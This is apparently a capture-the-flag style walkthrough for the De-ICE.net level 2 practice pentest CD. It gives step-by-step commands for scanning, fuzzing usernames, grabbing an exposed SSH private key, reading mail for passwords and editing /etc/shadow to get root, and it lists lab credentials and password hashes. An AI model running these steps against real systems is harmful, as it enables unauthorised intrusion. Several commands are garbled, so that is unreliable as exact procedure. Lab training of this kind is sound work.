Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3194808
Download video: http://www.mediafire.com/download.php?uegctyzdi2w
Commands: http://pastebin.com/f33cfe964


What is this?
This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.


What do I need?

> BackTrack 4 (Final)
> de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)
> Dictionary(s)


Software
Name: De-ICE.net
Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/
Download Link:


Forums/Support: http://forums.heorot.net/ and http://forums.heorot.net/viewtopic.php?f=18&t=16
WiKi/Support: http://de-ice.net/hackerpedia/index...._PenTest_Disks


Commands:
Code:
nmap -n 192.168.2.1-255

nmap -n -sV -sS -O 192.168.2.100

nmap -n -sV -sS -O 192.168.2.101

firefox 192.168.2.100

[+]kate -> list of possible usernames. Save. Filename: usernames.txt

firefox 192.168.2.101

[+]BackTrack -> Vulnerability Identification -> Fuzzers -> JBroFuzz. Web Directories -> List of usernames (+ root, admin)  with '~' infront. -> http://192.168.2.101 -> 80



firefox http://192.168.2.101/~pirrip

[+]kate -> Update usernames with the ones which we got a respond from. Save.

[+]BackTrck -> Web Application Analysis -> Web (frontend) -> nikto2

./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124

firefox http://192.168.2.101/~pirrip/.ssh

// Save both files

mv /root/id_rsa /http://root/.ssh/id_rsa

mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub

chmod 000 /http://root/.ssh/id_rsa

chmod 000 /http://root/.ssh/id_rsa.pub

ssh pirrip@192.168.2.100
// Yes

mailx
// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'

cd /etc/

vi passwd

// kate -> Update usernames with only valid ones.

vi group

sudo vi shadow
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [->],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st

su
// Password: 0l1v3rTw1st

cd /root/

ls -a

cd .save/

ls -a

chmod -R 777 /root/

//In BackTrack//

scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/

unzip great_expectations.zip

tar xf great_expectations.tar

strings Jan08

//In SSH//
sudo iv /var/mail/havisham

modprobe capability

//In BackTrack//
ftp 192.168.2.100
// Usrename: pirri. Password: 0l1v3rTw1st //

ls -a

//In SSH//

exit


//In BackTrack//

[+]Firefox -> Send a REAL email to: philip.pirrip.ge@gmail.com
// GAME OVER



----------------------------------------------------------------------------------------------------
Users
root:P1ckw1ckP@p3rs     root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
havisham:changeme       havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::
pirrip:0l1v3rTw1st      pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:               magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
----------------------------------------------------------------------------------------------------



Notes:

Video length: 09:07
Capture length: 30:35
Song: Ashley Wallbridge - Masquerade (Original Mix)

Blog Post: g0tmi1k: [Video] De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}
Forum Post:



~g0tmi1k